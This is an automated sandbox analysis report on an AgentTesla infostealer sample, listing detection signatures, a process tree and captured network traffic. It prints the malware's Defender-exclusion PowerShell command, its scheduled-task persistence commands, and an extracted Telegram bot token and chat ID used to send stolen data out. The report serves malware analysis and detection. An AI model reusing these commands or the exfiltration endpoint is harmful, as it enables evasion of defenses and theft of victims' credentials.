Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
z1E-catalogSamples.exe

Overview

General Information

Sample name:z1E-catalogSamples.exe
Analysis ID:1428897
MD5:2d9dfdb275d38155cba293dc619430fa
SHA1:523f6a7040f3b330e708a3e84d48a18bdcd77110
SHA256:9bf25ebe467e570fc91e2003b17061c765fcb54b6d505a7db43263981504fa5f
Tags:AgentTeslaexe
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected Telegram RAT
.NET source code contains potential unpacker
.NET source code contains very large array initializations
Adds a directory exclusion to Windows Defender
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • z1E-catalogSamples.exe (PID: 4856 cmdline: "C:\Users\user\Desktop\z1E-catalogSamples.exe" MD5: 2D9DFDB275D38155CBA293DC619430FA)
    • powershell.exe (PID: 2780 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vZkoWbol.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 3496 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vZkoWbol" /XML "C:\Users\user\AppData\Local\Temp\tmp9244.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 2640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 3496 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • z1E-catalogSamples.exe (PID: 3472 cmdline: "C:\Users\user\Desktop\z1E-catalogSamples.exe" MD5: 2D9DFDB275D38155CBA293DC619430FA)
  • vZkoWbol.exe (PID: 6460 cmdline: C:\Users\user\AppData\Roaming\vZkoWbol.exe MD5: 2D9DFDB275D38155CBA293DC619430FA)
    • schtasks.exe (PID: 7272 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vZkoWbol" /XML "C:\Users\user\AppData\Local\Temp\tmpA1D5.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • vZkoWbol.exe (PID: 7316 cmdline: "C:\Users\user\AppData\Roaming\vZkoWbol.exe" MD5: 2D9DFDB275D38155CBA293DC619430FA)
    • vZkoWbol.exe (PID: 7324 cmdline: "C:\Users\user\AppData\Roaming\vZkoWbol.exe" MD5: 2D9DFDB275D38155CBA293DC619430FA)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendMessage"}

Threatname: Agenttesla

{"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendMessage?chat_id=1210558492"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000000C.00000002.4526667510.0000000003157000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      0000000C.00000002.4526667510.0000000003131000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        0000000C.00000002.4526667510.0000000003131000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000006.00000002.4526832028.000000000324B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000006.00000002.4526832028.000000000324B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              Click to see the 24 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.z1E-catalogSamples.exe.43b9e58.1.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                0.2.z1E-catalogSamples.exe.43b9e58.1.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  0.2.z1E-catalogSamples.exe.43b9e58.1.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                    0.2.z1E-catalogSamples.exe.43b9e58.1.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                    • 0x314ea:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                    • 0x3155c:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                    • 0x315e6:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                    • 0x31678:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                    • 0x316e2:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                    • 0x31754:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                    • 0x317ea:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                    • 0x3187a:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                    7.2.vZkoWbol.exe.443ad98.3.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                      Click to see the 29 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: Potentially Suspicious PowerShell Child Processes
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vZkoWbol" /XML "C:\Users\user\AppData\Local\Temp\tmp9244.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vZkoWbol" /XML "C:\Users\user\AppData\Local\Temp\tmp9244.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vZkoWbol.exe", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2780, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vZkoWbol" /XML "C:\Users\user\AppData\Local\Temp\tmp9244.tmp", ProcessId: 3496, ProcessName: schtasks.exe
                      Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vZkoWbol.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vZkoWbol.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\z1E-catalogSamples.exe", ParentImage: C:\Users\user\Desktop\z1E-catalogSamples.exe, ParentProcessId: 4856, ParentProcessName: z1E-catalogSamples.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vZkoWbol.exe", ProcessId: 2780, ProcessName: powershell.exe
                      Sigma detected: Powershell Defender Exclusion
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vZkoWbol.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vZkoWbol.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\z1E-catalogSamples.exe", ParentImage: C:\Users\user\Desktop\z1E-catalogSamples.exe, ParentProcessId: 4856, ParentProcessName: z1E-catalogSamples.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vZkoWbol.exe", ProcessId: 2780, ProcessName: powershell.exe
                      Sigma detected: Suspicious Add Scheduled Task Parent
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vZkoWbol" /XML "C:\Users\user\AppData\Local\Temp\tmpA1D5.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vZkoWbol" /XML "C:\Users\user\AppData\Local\Temp\tmpA1D5.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\vZkoWbol.exe, ParentImage: C:\Users\user\AppData\Roaming\vZkoWbol.exe, ParentProcessId: 6460, ParentProcessName: vZkoWbol.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vZkoWbol" /XML "C:\Users\user\AppData\Local\Temp\tmpA1D5.tmp", ProcessId: 7272, ProcessName: schtasks.exe
                      Sigma detected: Suspicious Schtasks From Env Var Folder
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vZkoWbol" /XML "C:\Users\user\AppData\Local\Temp\tmp9244.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vZkoWbol" /XML "C:\Users\user\AppData\Local\Temp\tmp9244.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vZkoWbol.exe", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2780, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vZkoWbol" /XML "C:\Users\user\AppData\Local\Temp\tmp9244.tmp", ProcessId: 3496, ProcessName: schtasks.exe
                      Sigma detected: Non Interactive PowerShell Process Spawned
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vZkoWbol.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vZkoWbol.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\z1E-catalogSamples.exe", ParentImage: C:\Users\user\Desktop\z1E-catalogSamples.exe, ParentProcessId: 4856, ParentProcessName: z1E-catalogSamples.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vZkoWbol.exe", ProcessId: 2780, ProcessName: powershell.exe

                      Persistence and Installation Behavior

                      barindex
                      Sigma detected: Scheduled temp file as task from temp location
                      Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vZkoWbol" /XML "C:\Users\user\AppData\Local\Temp\tmp9244.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vZkoWbol" /XML "C:\Users\user\AppData\Local\Temp\tmp9244.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vZkoWbol.exe", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2780, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vZkoWbol" /XML "C:\Users\user\AppData\Local\Temp\tmp9244.tmp", ProcessId: 3496, ProcessName: schtasks.exe

                      Snort Signatures

                      Timestamp:04/19/24-19:33:10.146400
                      SID:2851779
                      Source Port:49708
                      Destination Port:443
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/19/24-19:33:06.739874
                      SID:2851779
                      Source Port:49706
                      Destination Port:443
                      Protocol:TCP
                      Classtype:A Network Trojan was detected

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Found malware configuration
                      Source: 7.2.vZkoWbol.exe.4400378.1.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendMessage?chat_id=1210558492"}
                      Source: vZkoWbol.exe.7324.12.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendMessage"}
                      Multi AV Scanner detection for dropped file
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeReversingLabs: Detection: 71%
                      Multi AV Scanner detection for submitted file
                      Source: z1E-catalogSamples.exeReversingLabs: Detection: 71%
                      Machine Learning detection for dropped file
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeJoe Sandbox ML: detected
                      Machine Learning detection for sample
                      Source: z1E-catalogSamples.exeJoe Sandbox ML: detected
                      Source: z1E-catalogSamples.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.5:49705 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49706 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.5:49707 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49708 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49726 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49735 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49738 version: TLS 1.2
                      Source: z1E-catalogSamples.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeCode function: 4x nop then jmp 0663B1F7h7_2_0663AB8C

                      Networking

                      barindex
                      Snort IDS alert for network traffic
                      Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.5:49706 -> 149.154.167.220:443
                      Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.5:49708 -> 149.154.167.220:443
                      Uses the Telegram API (likely for C&C communication)
                      Source: unknownDNS query: name: api.telegram.org
                      Source: unknownDNS query: name: api.telegram.org
                      Yara detected Generic Downloader
                      Source: Yara matchFile source: 0.2.z1E-catalogSamples.exe.43b9e58.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.z1E-catalogSamples.exe.437f438.2.raw.unpack, type: UNPACKEDPE
                      Source: global trafficHTTP traffic detected: POST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc60a788f191e0Host: api.telegram.orgContent-Length: 971Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc60a78b10ac3bHost: api.telegram.orgContent-Length: 971Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc641d35d1784cHost: api.telegram.orgContent-Length: 67144Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc6905e4c74819Host: api.telegram.orgContent-Length: 67144Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc6e654d78418eHost: api.telegram.orgContent-Length: 67144Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc71aad670e85bHost: api.telegram.orgContent-Length: 67155Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc74196518f1ddHost: api.telegram.orgContent-Length: 67155Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc6a4172022d82Host: api.telegram.orgContent-Length: 67155Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc78741e30d00bHost: api.telegram.orgContent-Length: 72005Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc6ed5c7b45081Host: api.telegram.orgContent-Length: 67155Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc70f0a363c025Host: api.telegram.orgContent-Length: 67155Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc72be64e6da25Host: api.telegram.orgContent-Length: 67155Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc801ba947090dHost: api.telegram.orgContent-Length: 67155Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc781440ce2291Host: api.telegram.orgContent-Length: 67138Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc84175737ff0bHost: api.telegram.orgContent-Length: 67138Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc7d9f4e31c274Host: api.telegram.orgContent-Length: 67138Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc8b4b8f6210f4Host: api.telegram.orgContent-Length: 67138Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc8048c2fa9c0cHost: api.telegram.orgContent-Length: 67138Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc8f1ec5eab97fHost: api.telegram.orgContent-Length: 67138Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc91ad9f6f5749Host: api.telegram.orgContent-Length: 67138Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc94e8357314faHost: api.telegram.orgContent-Length: 67138Expect: 100-continueConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc8528d0ad5c27Host: api.telegram.orgContent-Length: 67138Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc60a81bbe05f3Host: api.telegram.orgContent-Length: 67151Expect: 100-continue
                      Source: global trafficHTTP traffic detected: POST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc60a81bbe05f3Host: api.telegram.orgContent-Length: 67151Expect: 100-continueConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                      Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: unknownDNS query: name: api.ipify.org
                      Source: unknownDNS query: name: api.ipify.org
                      Source: unknownDNS query: name: api.ipify.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: unknownDNS traffic detected: queries for: api.ipify.org
                      Source: unknownHTTP traffic detected: POST /bot7177134832:AAFZbBRZvrMTexyCCRWrTRyGHf8Nct0rg7g/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc60a788f191e0Host: api.telegram.orgContent-Length: 971Expect: 100-continueConnection: Keep-Alive
                      Source: z1E-catalogSamples.exe, 00000006.00000002.4526832028.00000000036A3000.00000004.00000800.00020000.00000000.sdmp, z1E-catalogSamples.exe, 00000006.00000002.4526832028.0000000003707000.00000004.00000800.00020000.00000000.sdmp, z1E-catalogSamples.exe, 00000006.00000002.4526832028.00000000033E3000.00000004.00000800.00020000.00000000.sdmp, z1E-catalogSamples.exe, 00000006.00000002.4526832028.00000000035F0000.00000004.00000800.00020000.00000000.sdmp, z1E-catalogSamples.exe, 00000006.00000002.4526832028.000000000346A000.00000004.00000800.00020000.00000000.sdmp, vZkoWbol.exe, 0000000C.00000002.4526667510.0000000003157000.00000004.00000800.00020000.00000000.sdmp, vZkoWbol.exe, 0000000C.00000002.4526667510.00000000031E2000.00000004.00000800.00020000.00000000.sdmp, vZkoWbol.exe, 0000000C.00000002.4526667510.000000000334D000.00000004.00000800.00020000.00000000.sdmp, vZkoWbol.exe, 0000000C.00000002.4526667510.000000000327E000.00000004.00000800.00020000.00000000.sdmp, vZkoWbol.exe, 0000000C.00000002.4526667510.0000000003178000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
